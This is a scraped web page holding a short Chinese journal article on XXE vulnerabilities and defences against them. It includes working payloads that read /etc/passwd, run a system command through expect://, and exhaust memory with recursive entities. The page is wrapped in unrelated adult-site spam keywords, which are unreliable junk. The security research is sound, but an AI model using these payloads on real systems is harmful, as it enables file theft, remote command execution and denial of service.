亚洲免费av电影一区二区三区,日韩爱爱视频,51精品视频一区二区三区,91视频爱爱,日韩欧美在线播放视频,中文字幕少妇AV,亚洲电影中文字幕,久久久久亚洲av成人网址,久久综合视频网站,国产在线不卡免费播放

        ?

        XXE漏洞及其防御策略研究

        2018-05-14 02:18:35應(yīng)宗浩金海
        科技風(fēng) 2018年19期
        關(guān)鍵詞:漏洞

        應(yīng)宗浩 金海

        摘要:XXE漏洞是近年來(lái)產(chǎn)生的影響比較大的漏洞之一,能夠任意讀取文件,遠(yuǎn)程執(zhí)行命令,造成拒絕服務(wù)攻擊等。該文通過(guò)xxe漏洞背景介紹,給出相應(yīng)的攻擊手段,并提出防御策略,以期能夠引起人們對(duì)xxe漏洞的重視,并加強(qiáng)相關(guān)方面的安全開發(fā)工作。

        關(guān)鍵詞:XXE;漏洞;攻擊手段;防御策略

        XML是用于標(biāo)記電子文件使其具有結(jié)構(gòu)性的標(biāo)記語(yǔ)言,允許用戶對(duì)自己的標(biāo)記語(yǔ)言進(jìn)行定義。Web端,移動(dòng)端,云端等客戶端技術(shù)使用XML向業(yè)務(wù)應(yīng)用程序發(fā)送消息。為了使應(yīng)用程序使用自定義的XML消息,應(yīng)用程序必須去解析XML文檔并檢查格式是否正確。

        較早的或配置錯(cuò)誤的XML處理器無(wú)法準(zhǔn)確評(píng)估XML文件中的外部實(shí)體引用。攻擊者可以利用外部實(shí)體發(fā)動(dòng)攻擊。此種攻擊行為稱之為XXE(XML Enternal Entity Injection),即XML外部實(shí)體注入攻擊。

        1 XML基礎(chǔ)

        XML文檔結(jié)構(gòu)包括XML聲明、DTD文檔類型定義(可選)、文檔元素。

        以下是一個(gè)典型xml文檔

        <?xml version="1.0"?> <!—xml聲明—>

        <!DOCTYPE note [<!—DTD文檔類型定義,定義此文檔是 note 類型的文檔>

        <!ELEMENT note (head,body)><!定義note元素有四個(gè)元素>

        <!ELEMENT head (#PCDATA)><!定義head元素為”#PCDATA”類型>

        <!ELEMENT body (#PCDATA)><!定義body元素為”#PCDATA”類型>]>

        Reminder<!—文檔元素>

        You are a good man<!—文檔元素>

        DTD(文檔類型定義)的作用是定義 XML 文檔的合法構(gòu)建模塊。DTD 可以在 XML 文檔內(nèi)聲明,也可以外部引用。XXE漏洞關(guān)注的是外部實(shí)體引用,外部實(shí)體引用的代碼如下:

        <!ENTITY 實(shí)體名稱 SYSTEM "URI">

        2 xxe典型攻擊手段

        2.1 任意讀取文件

        <!DOCTYPE foo [<!ENTITY mytest SYSTEMfile:///etc/passwd>]>

        &mytest;

        代碼可以讀取/etc/passwd,file部分可以替換任意文件路徑,使得攻擊者能夠任意讀取文件。

        2.2 執(zhí)行系統(tǒng)命令

        <!DOCTYPEmytest [<!ELEMENT name ANY >

        <!ENTITY mytest SYSTEM "expect://id" >]>

        &mytest;

        該代碼能夠在服務(wù)器上執(zhí)行“id”命令,”id”命令可以替換為其他系統(tǒng)命令,通過(guò)執(zhí)行系統(tǒng)命令.

        2.3 拒絕服務(wù)攻擊

        <!DOCTYPE data [

        <!ENTITY a0 "dos" >

        <!ENTITY a1 "&a0;&a0;&a0;&a0;&a0;&a0;&a0;&a0;&a0;&a0;">

        <!ENTITY a2 "&a1;&a1;&a1;&a1;&a1;&a1;&a1;&a1;&a1;&a1;">

        <!ENTITY a3 "&a2;&a2;&a2;&a2;&a2;&a2;&a2;&a2;&a2;&a2;">

        <!ENTITY a4 "&a3;&a3;&a3;&a3;&a3;&a3;&a3;&a3;&a3;&a3;">

        ]>

        &a4;

        該代碼通過(guò)創(chuàng)建一項(xiàng)遞歸的 XML 定義,構(gòu)造惡意的XML實(shí)體文件耗盡可用內(nèi)存,造成拒絕服務(wù)攻擊。

        3 XXE防御策略

        大部分XML解析器無(wú)法正確解析xxe攻擊中的實(shí)體。因此可以配置XML處理器去使用本地靜態(tài)的DTD,不允許XML中含有自聲明的DTD??梢允褂瞄_發(fā)語(yǔ)言提供的禁用外部實(shí)體的方法,從而避免基于XXE漏洞的攻擊。

        另外,升級(jí)libxml版本至2.9.0,libxml 2.9.0 以后默認(rèn)不解析外部實(shí)體,也可以通過(guò)升級(jí)libxml版本進(jìn)行xxe防御。

        參考文獻(xiàn):

        [1]開放式Web應(yīng)用程序安全項(xiàng)目.OWASP Top 10 2017[EB/OL]. http://www.owasp.org.cn/owaspproject/OWASPTop102017v1.3.pdf,20171201.

        [2]Mark4z5. 未知攻焉知防——XXE漏洞攻防[EB/OL]. https://security.tencent.com/index.php/blog/msg/69,20140923.

        [3]丁躍潮,張濤.XML實(shí)用教程[M].北京:北京大學(xué)出版社,2006.

        [4]ChristopherSpth,ChristianMainka,VladislavMladenov.DTD/XXEcheatsheat.webinsecurity.blogspot.de/2016/03/xxecheatsheet.html.20160303.

        作者簡(jiǎn)介:應(yīng)宗浩(1997),男,浙江溫州人,本科在讀,研究方向:信息安全,物聯(lián)網(wǎng)安全。

        猜你喜歡
        漏洞
        漏洞
        網(wǎng)絡(luò)安全漏洞管理與漏洞情報(bào)庫(kù)建設(shè)方案探討及研究
        漏洞在哪里
        基于selenium的SQL注入漏洞檢測(cè)方法
        電子制作(2019年11期)2019-07-04 00:34:40
        Windows 10被曝新零日漏洞涉及3大版本
        偵探推理游戲(二)
        三明:“兩票制”堵住加價(jià)漏洞
        漏洞在哪兒
        Java 反序列化漏洞研究
        高鐵急救應(yīng)補(bǔ)齊三漏洞
        亚洲av中文无码乱人伦在线播放| 91精品国产色综合久久| 99999久久久久久亚洲| 人妻 日韩精品 中文字幕| 亚洲另在线日韩综合色| 丝袜美腿亚洲综合玉足| 国产高颜值女主播在线| 久久精品免费一区二区三区| 思思99热精品免费观看| 无人视频在线播放在线观看免费| 精品国产亚洲第一区二区三区| 亚洲欧美色一区二区三区| 少妇人妻在线视频| 无码人妻精品中文字幕免费| 亚洲成人精品在线一区二区| 免费a级毛片18禁网站app| 国产一区二区三区四区五区vm| 亚洲人成无码网站十八禁| 一区二区三区中文字幕在线播放 | 91青青草在线观看视频| 成人av在线久色播放| 蜜桃视频无码区在线观看| 人妻久久999精品1024| 日本小视频一区二区三区| 日本伊人精品一区二区三区| 丰满少妇高潮惨叫正在播放| 韩日无码不卡| 东京热加勒比视频一区| 狠狠色噜噜狠狠狠777米奇小说| 国产在线一91区免费国产91| 视频一区中文字幕亚洲| 中文字幕在线乱码一区| 久久夜色精品国产噜噜亚洲av| 婷婷色国产精品视频一区| 日本二区三区在线免费| 亚洲精品美女久久777777| 国产偷窥熟女精品视频| 国产一区二区精品av| 少妇被黑人整得嗷嗷叫视频| 久久夜色精品国产噜噜麻豆| 精品国产性色av网站|